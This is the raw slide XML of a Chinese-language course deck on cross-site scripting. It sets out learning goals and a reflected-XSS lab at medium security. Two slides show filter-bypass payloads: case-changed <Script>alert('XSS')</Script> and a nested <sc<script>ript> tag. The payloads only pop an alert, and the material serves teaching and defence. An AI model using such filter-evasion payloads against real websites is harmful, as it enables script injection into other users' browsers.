            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4118976" y="2968181"/>
              <a:ext cx="2885680" cy="154963"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="n"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent1">
                          <a:lumMod val="60000"/>
                          <a:lumOff val="40000"/>
                        </a:schemeClr>
                      </a:gs>
                      <a:gs pos="60000">
                        <a:schemeClr val="accent1"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="2700000" scaled="0"/>
                  </a:gradFill>
                </a:rPr>
                <a:t>了解跨站脚本 (XSS)攻击工作原理。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name="ïSľíḍé"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7409381" y="2959704"/>
              <a:ext cx="3265246" cy="154963"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="n"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent1">
                          <a:lumMod val="60000"/>
                          <a:lumOff val="40000"/>
                        </a:schemeClr>
                      </a:gs>
                      <a:gs pos="60000">
                        <a:schemeClr val="accent1"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="2700000" scaled="0"/>
                  </a:gradFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>掌握跨站脚本 (XSS)攻击的分类。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="90" name="直接连接符 89"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3926561" y="3348425"/>
              <a:ext cx="7759700" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="6350" cap="rnd">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="文本框 90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2396504" y="1587028"/>
            <a:ext cx="1534885" cy="458459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>知识目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="文本框 91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320476" y="3167581"/>
            <a:ext cx="1534885" cy="458459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>能力目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="93" name="#472308"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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2133615" y="3648166"/>
            <a:ext cx="9067800" cy="1152404"/>
            <a:chOff x="3886789" y="3205671"/>
            <a:chExt cx="7675081" cy="1152404"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="i$ḻîḍe"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4209272" y="3205671"/>
              <a:ext cx="4136374" cy="1076325"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="n"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent4">
                          <a:lumMod val="60000"/>
                          <a:lumOff val="40000"/>
                        </a:schemeClr>
                      </a:gs>
                      <a:gs pos="60000">
                        <a:schemeClr val="accent4"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="2700000" scaled="0"/>
                  </a:gradFill>
                </a:rPr>
                <a:t>会识别防范跨站脚本 (XSS)漏洞。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="n"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent4">
                          <a:lumMod val="60000"/>
                          <a:lumOff val="40000"/>
                        </a:schemeClr>
                      </a:gs>
                      <a:gs pos="60000">
                        <a:schemeClr val="accent4"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="2700000" scaled="0"/>
                  </a:gradFill>
                </a:rPr>
                <a:t>能够防范跨站脚本 (XSS)漏洞攻击。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="96" name="直接连接符 95"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3886789" y="4281875"/>
              <a:ext cx="7675081" cy="76200"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="6350" cap="rnd">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="97" name="#472308"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6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2437097" y="5185781"/>
            <a:ext cx="6433185" cy="1076325"/>
            <a:chOff x="4065766" y="2857691"/>
            <a:chExt cx="5445116" cy="1076325"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="ïṡļîḍe"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4065766" y="2953576"/>
              <a:ext cx="5445116" cy="337185"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="n"/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="99" name="ïSľíḍé"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4160361" y="2857691"/>
              <a:ext cx="5072649" cy="1076325"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="n"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent1">
                          <a:lumMod val="60000"/>
                          <a:lumOff val="40000"/>
                        </a:schemeClr>
                      </a:gs>
                      <a:gs pos="60000">
                        <a:schemeClr val="accent1"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="2700000" scaled="0"/>
                  </a:gradFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>形成严谨、细致作风，培养创新精神。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="n"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent1">
                          <a:lumMod val="60000"/>
                          <a:lumOff val="40000"/>
                        </a:schemeClr>
                      </a:gs>
                      <a:gs pos="60000">
                        <a:schemeClr val="accent1"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="2700000" scaled="0"/>
                  </a:gradFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t> 增强学生法律意识，树立正确的网络安全观。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326654" y="4710593"/>
            <a:ext cx="1534885" cy="506730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>素质目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="ïṡļîḍe"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2513298" y="2742936"/>
            <a:ext cx="3409315" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>熟悉跨站脚本 (XSS)漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="60000">
                    <a:schemeClr val="accent1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="0"/>
              </a:gradFill>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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首先，还是先测试一下这个网页有没有XSS漏洞，此时并没有弹窗，下面的输出是&lt;script&gt;中的内容，可以初步推断出来，后端可能把&lt;script&gt;给“过滤“了，再次测试，发现确实是这样。如图10-13所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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2.中安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 13"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="3048000"/>
            <a:ext cx="5261610" cy="3398520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="6476365"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-13  弹窗测试结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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对于在SQL注入中，对于被过滤的关键词可以采用以下这几种方法，包括了大小写、转义、内嵌、替换等操作。通过大小写转换，可见更改大小写后&lt;script&gt;中的内容被执行了，因此，可以构造脚本然后执行相关代码&lt;Script&gt;alert('XSS')&lt;/Script&gt;。具体如图10-14所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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2.中安全级别</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4114800" y="4830445"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-14    XSS弹出窗口测试结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="3100705"/>
            <a:ext cx="8361045" cy="1647190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1541780"/>
            <a:ext cx="10398760" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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在内嵌中，编辑下面代码&lt;sc&lt;script&gt;ript&gt;alert('xss')&lt;/script&gt;，然后在XSS测试页面中执行，具体如图10-15所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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反射型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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2.中安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2667000"/>
            <a:ext cx="7735570" cy="2179955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="5029200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-15 内嵌执行结果图</a:t>
